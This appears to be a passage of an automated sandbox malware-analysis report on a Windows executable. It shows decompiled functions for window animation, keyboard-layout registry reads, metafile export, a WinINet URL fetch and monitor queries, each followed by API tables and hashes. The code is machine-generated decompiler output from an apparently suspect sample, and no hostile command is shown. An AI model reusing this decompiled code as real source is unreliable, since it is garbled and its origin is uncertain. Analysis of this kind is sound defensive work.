				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E00404C80(_t119) < 0x64 &&  *0x49bc1c != 0) {
					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
					if(_v12 != 0) {
						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
						if(_v12 == 0) {
							E00445E24( &_v36);
							if(_v32 <= _v24) {
							}
						}
						 *0x49bc1c(E00441704(_v8), 0x64,  *0x0049BD24 | 0x00040000);
					}
				}
				_t80 =  *0x49dbcc; // 0x49ebb8
				E0043EE38(_v8,  *((intOrPtr*)( *_t80 + 0x30)));
				ShowWindow(E00441704(_v8), 4);
				 *((intOrPtr*)( *_v8 + 0x7c))();
				_pop(_t136);
				 *[fs:eax] = _t136;
				_push(0x442db0);
				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
				_t91 = _v8;
				 *((char*)(_t91 + 0x210)) = 0;
				return _t91;
			}
















                                                    0x00442bde
                                                    0x00442bdf
                                                    0x00442be0
                                                    0x00442be1
                                                    0x00442be2
                                                    0x00442be4
                                                    0x00442be7
                                                    0x00442bf0
                                                    0x00442bf9
                                                    0x00442bfa
                                                    0x00442bff
                                                    0x00442c02
                                                    0x00442c0a
                                                    0x00442c0f
                                                    0x00442c19
                                                    0x00442c30
                                                    0x00442c3f
                                                    0x00442c3f
                                                    0x00442c54
                                                    0x00442c63
                                                    0x00442c63
                                                    0x00442c70
                                                    0x00442c79
                                                    0x00442c79
                                                    0x00442c86
                                                    0x00442c8f
                                                    0x00442c8f
                                                    0x00442cb5
                                                    0x00442ccd
                                                    0x00442cf5
                                                    0x00442cfe
                                                    0x00442d0d
                                                    0x00442d16
                                                    0x00442d24
                                                    0x00442d2f
                                                    0x00442d2f
                                                    0x00442d2f
                                                    0x00442d53
                                                    0x00442d53
                                                    0x00442cfe
                                                    0x00442d59
                                                    0x00442d66
                                                    0x00442d76
                                                    0x00442d80
                                                    0x00442d85
                                                    0x00442d88
                                                    0x00442d8b
                                                    0x00442d98
                                                    0x00442d9e
                                                    0x00442da1
                                                    0x00442da8

                                                    APIs
                                                    • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,00442DA9), ref: 00442CB5
                                                    • GetTickCount.KERNEL32 ref: 00442CBA
                                                    • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 00442CF5
                                                    • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 00442D0D
                                                    • AnimateWindow.USER32(00000000,00000064,00000001), ref: 00442D53
                                                    • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,00442DA9), ref: 00442D76
                                                      • Part of subcall function 00445E24: GetCursorPos.USER32(?,?,00442D29,00001018,00000000,00000000,00000000,00001016,00000000,?,00000000,00000000,000000FF,?,?,?), ref: 00445E28
                                                    • GetTickCount.KERNEL32 ref: 00442D90
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                    • String ID:
                                                    • API String ID: 3024527889-0
                                                    • Opcode ID: 54a305cc09a56bb811332e01a25417af1ec60ed1c2f6bf35ac9e9272792253b9
                                                    • Instruction ID: ec947e6fb4e605e95c0b99b07f50ee8800e03fd8639e7176e4c102910f3e7fae
                                                    • Opcode Fuzzy Hash: 54a305cc09a56bb811332e01a25417af1ec60ed1c2f6bf35ac9e9272792253b9
                                                    • Instruction Fuzzy Hash: 1F513D74A00109DFEB10DF99C986E9EB7F5AF04304F6045AAF500EB395DB78AE40DB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00458464 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E00458464(intOrPtr __eax, void* __ebx, void* __fp0) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				char _v20;
				void* _v24;
				struct HKL__* _v280;
				char _v536;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				void* _t60;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t117;
				void* _t118;
				intOrPtr _t119;
				void* _t129;

				_t129 = __fp0;
				_t117 = _t118;
				_t119 = _t118 + 0xfffffda0;
				_v612 = 0;
				_v8 = __eax;
				_push(_t117);
				_push(0x45860f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0x458616);
					return E004049C0( &_v612);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E00403BBC(1);
					E004049C0(_v8 + 0x38);
					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
					if(_t60 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E0041D5D8( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v20 = _t60 + 1;
						_v24 =  &_v280;
						do {
							if(E00446294( *_v24) == 0) {
								goto L9;
							} else {
								_v608 =  *_v24;
								_v604 = 0;
								if(RegOpenKeyExA(0x80000002, E0040A5E4( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
									goto L9;
								} else {
									_push(_t117);
									_push(0x4585cb);
									_push( *[fs:eax]);
									 *[fs:eax] = _t119;
									_v12 = 0x100;
									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
										E00404C30( &_v612, 0x100,  &_v536);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E00404C30(_v8 + 0x38, 0x100,  &_v536);
										}
									}
									_pop(_t111);
									 *[fs:eax] = _t111;
									_push(0x4585d2);
									return RegCloseKey(_v16);
								}
							}
							goto L12;
							L9:
							_v24 = _v24 + 4;
							_t38 =  &_v20;
							 *_t38 = _v20 - 1;
						} while ( *_t38 != 0);
						goto L10;
					}
				}
				L12:
			}





















                                                    0x00458464
                                                    0x00458465
                                                    0x00458467
                                                    0x00458470
                                                    0x00458476
                                                    0x0045847b
                                                    0x0045847c
                                                    0x00458481
                                                    0x00458484
                                                    0x0045848e
                                                    0x004585f0
                                                    0x004585f8
                                                    0x004585fb
                                                    0x004585fe
                                                    0x0045860e
                                                    0x00458494
                                                    0x004584a3
                                                    0x004584ac
                                                    0x004584bf
                                                    0x004584c2
                                                    0x004585df
                                                    0x004585e5
                                                    0x004585eb
                                                    0x00000000
                                                    0x004584c8
                                                    0x004584c9
                                                    0x004584d2
                                                    0x004584d5
                                                    0x004584e1
                                                    0x00000000
                                                    0x004584e7
                                                    0x004584f9
                                                    0x004584ff
                                                    0x00458529
                                                    0x00000000
                                                    0x0045852f
                                                    0x00458531
                                                    0x00458532
                                                    0x00458537
                                                    0x0045853a
                                                    0x0045853d
                                                    0x00458563
                                                    0x00458576
                                                    0x0045858e
                                                    0x0045859c
                                                    0x004585af
                                                    0x004585af
                                                    0x0045859c
                                                    0x004585b6
                                                    0x004585b9
                                                    0x004585bc
                                                    0x004585ca
                                                    0x004585ca
                                                    0x00458529
                                                    0x00000000
                                                    0x004585d2
                                                    0x004585d2
                                                    0x004585d6
                                                    0x004585d6
                                                    0x004585d6
                                                    0x00000000
                                                    0x004584d5
                                                    0x004584c2
                                                    0x00000000

                                                    APIs
                                                    • GetKeyboardLayoutList.USER32(00000040,?,00000000,0045860F,?,00000000,?,00458671,00000000,?,0043D4D3), ref: 004584BA
                                                    • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00458522
                                                    • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,004585CB,?,80000002,00000000), ref: 0045855C
                                                    • RegCloseKey.ADVAPI32(?,004585D2,00000000,?,00000100,00000000,004585CB,?,80000002,00000000), ref: 004585C5
                                                    Strings
                                                    • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 0045850C
                                                    • layout text, xrefs: 00458553
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                    • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                    • API String ID: 1703357764-2652665750
                                                    • Opcode ID: 8cc75bf8530aa7b8bc3295c685c4afb19f65476633fa01bc8007fe3bd1315606
                                                    • Instruction ID: 7c903f8fd9ad85d3247752ddaabe7f8220cad0ab59f1ef766b0bf81713acb4c4
                                                    • Opcode Fuzzy Hash: 8cc75bf8530aa7b8bc3295c685c4afb19f65476633fa01bc8007fe3bd1315606
                                                    • Instruction Fuzzy Hash: 7D415174A0420DAFDB10DF55C981B9EB7F8EB48305F5140EAE904B7352DB78AE04CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004288B4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 70%
                                                    			E004288B4(void* __eax, void* __edx) {
				BYTE* _v8;
				int _v12;
				struct HDC__* _v16;
				short _v18;
				signed int _v24;
				short _v26;
				short _v28;
				char _v38;
				void* __ebx;
				void* __ebp;
				signed int _t35;
				struct HDC__* _t43;
				void* _t65;
				intOrPtr _t67;
				intOrPtr _t77;
				void* _t80;
				void* _t83;
				void* _t85;
				intOrPtr _t86;

				_t83 = _t85;
				_t86 = _t85 + 0xffffffdc;
				_t80 = __edx;
				_t65 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
					return __eax;
				} else {
					E004032B4( &_v38, 0x16);
					_t67 =  *((intOrPtr*)(_t65 + 0x28));
					_v38 = 0x9ac6cdd7;
					_t35 =  *((intOrPtr*)(_t67 + 0x18));
					if(_t35 != 0) {
						_v24 = _t35;
					} else {
						_v24 = 0x60;
					}
					_v28 = MulDiv( *(_t67 + 0xc), _v24 & 0x0000ffff, 0x9ec);
					_v26 = MulDiv( *(_t67 + 0x10), _v24 & 0x0000ffff, 0x9ec);
					_t43 = E00426DA8( &_v38);
					_v18 = _t43;
					_push(0);
					L00407638();
					_v16 = _t43;
					_push(_t83);
					_push(0x4289ef);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					_v12 = GetWinMetaFileBits( *(_t67 + 8), 0, 0, 8, _v16);
					_v8 = E0040275C(_v12);
					_push(_t83);
					_push(0x4289cf);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					if(GetWinMetaFileBits( *(_t67 + 8), _v12, _v8, 8, _v16) < _v12) {
						E00425FB8(_t67);
					}
					E0041D904(_t80, 0x16,  &_v38);
					E0041D904(_t80, _v12, _v8);
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(0x4289d6);
					return E0040277C(_v8);
				}
			}






















                                                    0x004288b5
                                                    0x004288b7
                                                    0x004288bc
                                                    0x004288be
                                                    0x004288c4
                                                    0x004289fb
                                                    0x004288ca
                                                    0x004288d4
                                                    0x004288d9
                                                    0x004288dc
                                                    0x004288e3
                                                    0x004288ea
                                                    0x004288f4
                                                    0x004288ec
                                                    0x004288ec
                                                    0x004288ec
                                                    0x0042890b
                                                    0x00428922
                                                    0x00428929
                                                    0x0042892e
                                                    0x00428932
                                                    0x00428934
                                                    0x00428939
                                                    0x0042893e
                                                    0x0042893f
                                                    0x00428944
                                                    0x00428947
                                                    0x0042895d
                                                    0x00428968
                                                    0x0042896d
                                                    0x0042896e
                                                    0x00428973
                                                    0x00428976
                                                    0x00428993
                                                    0x00428995
                                                    0x00428995
                                                    0x004289a4
                                                    0x004289b1
                                                    0x004289b8
                                                    0x004289bb
                                                    0x004289be
                                                    0x004289ce
                                                    0x004289ce

                                                    APIs
                                                    • MulDiv.KERNEL32(?,?,000009EC), ref: 00428906
                                                    • MulDiv.KERNEL32(?,?,000009EC), ref: 0042891D
                                                    • 733AAC50.USER32(00000000,?,?,000009EC,?,?,000009EC), ref: 00428934
                                                    • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,004289EF,?,00000000,?,?,000009EC,?,?,000009EC), ref: 00428958
                                                    • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,004289CF,?,?,00000000,00000000,00000008,?,00000000,004289EF), ref: 0042898B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: BitsFileMeta
                                                    • String ID: `
                                                    • API String ID: 858000408-2679148245
                                                    • Opcode ID: a9f53bc28096eb00c5e5236918538b4a0fd584b4a4d8f7f8bd18cc9ec4334467
                                                    • Instruction ID: f2e5e9c8815675a612d27dd2057d142453f41d2d556f4b9068e3620b80c0e0fa
                                                    • Opcode Fuzzy Hash: a9f53bc28096eb00c5e5236918538b4a0fd584b4a4d8f7f8bd18cc9ec4334467
                                                    • Instruction Fuzzy Hash: F6314575B00218ABDB01EFD5D882ABEB7B8EF4D704F50445AF904FB281D678AD40D7A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00474FC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89networkfileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E00474FC0(void* __eax, void* __ebx, void* __edx, void* __esi) {
				void* _v8;
				void* _v12;
				long _v16;
				void _v1042;
				char _v1048;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t60;
				void* _t62;
				void* _t63;
				intOrPtr _t64;

				_t62 = _t63;
				_t64 = _t63 + 0xfffffbec;
				_v1048 = 0;
				_t47 = __edx;
				_t60 = __eax;
				_push(_t62);
				_push(0x4750fb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t64;
				E004049C0(__edx);
				_v8 = InternetOpenA("MyApp", 0, 0, 0, 0);
				_push(_t62);
				_push(0x4750db);
				_push( *[fs:eax]);
				 *[fs:eax] = _t64;
				if(_v8 == 0) {
					L6:
					_pop(_t55);
					 *[fs:eax] = _t55;
					_push(0x4750e2);
					return InternetCloseHandle(_v8);
				} else {
					_v12 = InternetOpenUrlA(_v8, E00404E80(_t60), 0, 0, 0x84000000, 0);
					if(_v12 == 0) {
						goto L6;
					} else {
						_push(_t62);
						_push(0x4750bd);
						_push( *[fs:eax]);
						 *[fs:eax] = _t64;
						while(1) {
							_v16 = 0x400;
							InternetReadFile(_v12,  &_v1042, 0x400,  &_v16);
							if(_v16 == 0) {
								break;
							}
							 *((char*)(_t62 + _v16 - 0x40e)) = 0;
							E00404C30( &_v1048, 0x402,  &_v1042);
							E00404C88(_t47, _v1048);
						}
						_pop(_t56);
						 *[fs:eax] = _t56;
						_push(0x4750c4);
						return InternetCloseHandle(_v12);
					}
				}
			}















                                                    0x00474fc1
                                                    0x00474fc3
                                                    0x00474fcd
                                                    0x00474fd3
                                                    0x00474fd5
                                                    0x00474fd9
                                                    0x00474fda
                                                    0x00474fdf
                                                    0x00474fe2
                                                    0x00474fe7
                                                    0x00474ffe
                                                    0x00475003
                                                    0x00475004
                                                    0x00475009
                                                    0x0047500c
                                                    0x00475013
                                                    0x004750c4
                                                    0x004750c6
                                                    0x004750c9
                                                    0x004750cc
                                                    0x004750da
                                                    0x00475019
                                                    0x00475035
                                                    0x0047503c
                                                    0x00000000
                                                    0x00475042
                                                    0x00475044
                                                    0x00475045
                                                    0x0047504a
                                                    0x0047504d
                                                    0x00475050
                                                    0x00475050
                                                    0x0047506b
                                                    0x00475074
                                                    0x00000000
                                                    0x00000000
                                                    0x00475079
                                                    0x00475092
                                                    0x0047509f
                                                    0x0047509f
                                                    0x004750a8
                                                    0x004750ab
                                                    0x004750ae
                                                    0x004750bc
                                                    0x004750bc
                                                    0x0047503c

                                                    APIs
                                                    • InternetOpenA.WININET(MyApp,00000000,00000000,00000000,00000000), ref: 00474FF9
                                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00475030
                                                    • InternetReadFile.WININET(00000000,?,00000400,00000400), ref: 0047506B
                                                    • InternetCloseHandle.WININET(00000000), ref: 004750B7
                                                    • InternetCloseHandle.WININET(00000000), ref: 004750D5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$CloseHandleOpen$FileRead
                                                    • String ID: MyApp
                                                    • API String ID: 3121278467-2115267534
                                                    • Opcode ID: 1fccfd11a45c6cc4102efae17bab0ce8ab5d7e7740f69415ac293a44f6d9b99d
                                                    • Instruction ID: 49772c5e95778878b0e4af45138c7482376825189897ce4c7807679e07b59e25
                                                    • Opcode Fuzzy Hash: 1fccfd11a45c6cc4102efae17bab0ce8ab5d7e7740f69415ac293a44f6d9b99d
                                                    • Instruction Fuzzy Hash: 2C31A7B1A04748ABE711DBA5DC12BDA77BCE748704F6184BAB704E76C0D6BC5940CA5C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00448DC4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80libraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 56%
                                                    			E00448DC4(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr _t9;
				void* _t11;
				intOrPtr _t17;
				void* _t28;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t37;
				struct HINSTANCE__* _t41;
				void* _t43;
				intOrPtr _t45;
				intOrPtr _t46;

				_t45 = _t46;
				_push(__ebx);
				_t43 = __edx;
				_t28 = __eax;
				if( *0x49eba0 == 0) {
					 *0x49eba0 = E0040D9DC("comctl32.dll", __eax);
					if( *0x49eba0 >= 0x60000) {
						_t41 = GetModuleHandleA("comctl32.dll");
						if(_t41 != 0) {
							 *0x49eba4 = GetProcAddress(_t41, "ImageList_WriteEx");
						}
					}
				}
				_v8 = E00422634(_t43, 1, 0);
				_push(_t45);
				_push(0x448ebe);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46;
				if( *0x49eba4 == 0) {
					_t9 = _v8;
					if(_t9 != 0) {
						_t9 = _t9 - 0xffffffec;
					}
					_push(_t9);
					_t11 = E00447D0C(_t28);
					_push(_t11);
					L0042C4AC();
					if(_t11 == 0) {
						_t33 =  *0x49d9c8; // 0x422f10
						E0040D200(_t33, 1);
						E00404378();
					}
				} else {
					_t17 = _v8;
					if(_t17 != 0) {
						_t17 = _t17 - 0xffffffec;
					}
					_push(_t17);
					_push(1);
					_push(E00447D0C(_t28));
					if( *0x49eba4() != 0) {
						_t34 =  *0x49d9c8; // 0x422f10
						E0040D200(_t34, 1);
						E00404378();
					}
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(0x448ec5);
				return E00403BEC(_v8);
			}
















                                                    0x00448dc5
                                                    0x00448dc8
                                                    0x00448dcb
                                                    0x00448dcd
                                                    0x00448dd6
                                                    0x00448de2
                                                    0x00448df1
                                                    0x00448dfd
                                                    0x00448e01
                                                    0x00448e0e
                                                    0x00448e0e
                                                    0x00448e01
                                                    0x00448df1
                                                    0x00448e23
                                                    0x00448e28
                                                    0x00448e29
                                                    0x00448e2e
                                                    0x00448e31
                                                    0x00448e3b
                                                    0x00448e75
                                                    0x00448e7a
                                                    0x00448e7c
                                                    0x00448e7c
                                                    0x00448e7f
                                                    0x00448e82
                                                    0x00448e87
                                                    0x00448e88
                                                    0x00448e8f
                                                    0x00448e91
                                                    0x00448e9e
                                                    0x00448ea3
                                                    0x00448ea3
                                                    0x00448e3d
                                                    0x00448e3d
                                                    0x00448e42
                                                    0x00448e44
                                                    0x00448e44
                                                    0x00448e47
                                                    0x00448e48
                                                    0x00448e51
                                                    0x00448e5a
                                                    0x00448e5c
                                                    0x00448e69
                                                    0x00448e6e
                                                    0x00448e6e
                                                    0x00448e5a
                                                    0x00448eaa
                                                    0x00448ead
                                                    0x00448eb0
                                                    0x00448ebd

                                                    APIs
                                                      • Part of subcall function 0040D9DC: 73E714E0.VERSION(00000000,?,00000000,0040DAB2), ref: 0040DA1E
                                                      • Part of subcall function 0040D9DC: 73E714C0.VERSION(00000000,?,00000000,?,00000000,0040DA95,?,00000000,?,00000000,0040DAB2), ref: 0040DA53
                                                      • Part of subcall function 0040D9DC: 73E71500.VERSION(?,0040DAC4,?,?,00000000,?,00000000,?,00000000,0040DA95,?,00000000,?,00000000,0040DAB2), ref: 0040DA6D
                                                    • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00448DF8
                                                    • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 00448E09
                                                    • 739F1DE0.COMCTL32(00000000,?,00000000,00448EBE), ref: 00448E88
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: E714$AddressE71500HandleModuleProc
                                                    • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                                    • API String ID: 314815179-3125200627
                                                    • Opcode ID: 07ee34b8be0565e7f1cf5a0c4b1dbc2c1134b74eaf3696c36e383b944ea21b8f
                                                    • Instruction ID: 78786ebc40bd40dec1c5389fa6359cb69700be1fbc3bb7ccab78b7c5a69fbc81
                                                    • Opcode Fuzzy Hash: 07ee34b8be0565e7f1cf5a0c4b1dbc2c1134b74eaf3696c36e383b944ea21b8f
                                                    • Instruction Fuzzy Hash: E3214870A04201ABE710EB7ADD56B6F36A8AB55708B60057FF805E72A2DF7DAC00D61D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042C900 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 47%
                                                    			E0042C900(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x49e92d != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00407298();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x49e914; // 0x42c900
					 *0x49e914 = E0042C4FC(5, _t23, _t26, _t27, _t29);
					_t24 =  *0x49e914(_t27, _t29);
				}
				return _t24;
			}














                                                    0x0042c909
                                                    0x0042c90c
                                                    0x0042c916
                                                    0x0042c93b
                                                    0x0042c943
                                                    0x0042c963
                                                    0x0042c968
                                                    0x0042c973
                                                    0x0042c97e
                                                    0x0042c988
                                                    0x0042c989
                                                    0x0042c98a
                                                    0x0042c98b
                                                    0x0042c98c
                                                    0x0042c98d
                                                    0x0042c997
                                                    0x0042c999
                                                    0x0042c9a1
                                                    0x0042c9a2
                                                    0x0042c9a2
                                                    0x0042c9a7
                                                    0x0042c9a7
                                                    0x0042c918
                                                    0x0042c91d
                                                    0x0042c92a
                                                    0x0042c937
                                                    0x0042c937
                                                    0x0042c9b1

                                                    APIs
                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042C958
                                                    • GetSystemMetrics.USER32 ref: 0042C96D
                                                    • GetSystemMetrics.USER32 ref: 0042C978
                                                    • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042C9A2
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                    • String ID: DISPLAY$GetMonitorInfoA
                                                    • API String ID: 2545840971-1370492664
                                                    • Opcode ID: 8a9a46968513322436fba69e5700a9e92a77edf146df8e9d6d7adf034272d7b6
                                                    • Instruction ID: f52c56f8859c3bc03712ace229276911b675d95da7c00cdafe0d7f24be773c7c
                                                    • Opcode Fuzzy Hash: 8a9a46968513322436fba69e5700a9e92a77edf146df8e9d6d7adf034272d7b6
                                                    • Instruction Fuzzy Hash: 3E11B4F17017249FD720DF61AC84BABB7A8FB4A310F40493FE94597250D375A940C7AA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042C9D4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 47%
                                                    			E0042C9D4(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x49e92e != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00407298();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x49e918; // 0x42c9d4
					 *0x49e918 = E0042C4FC(6, _t23, _t26, _t27, _t29);
					_t24 =  *0x49e918(_t27, _t29);
				}
				return _t24;
			}














                                                    0x0042c9dd
                                                    0x0042c9e0
                                                    0x0042c9ea
                                                    0x0042ca0f
                                                    0x0042ca17
                                                    0x0042ca37
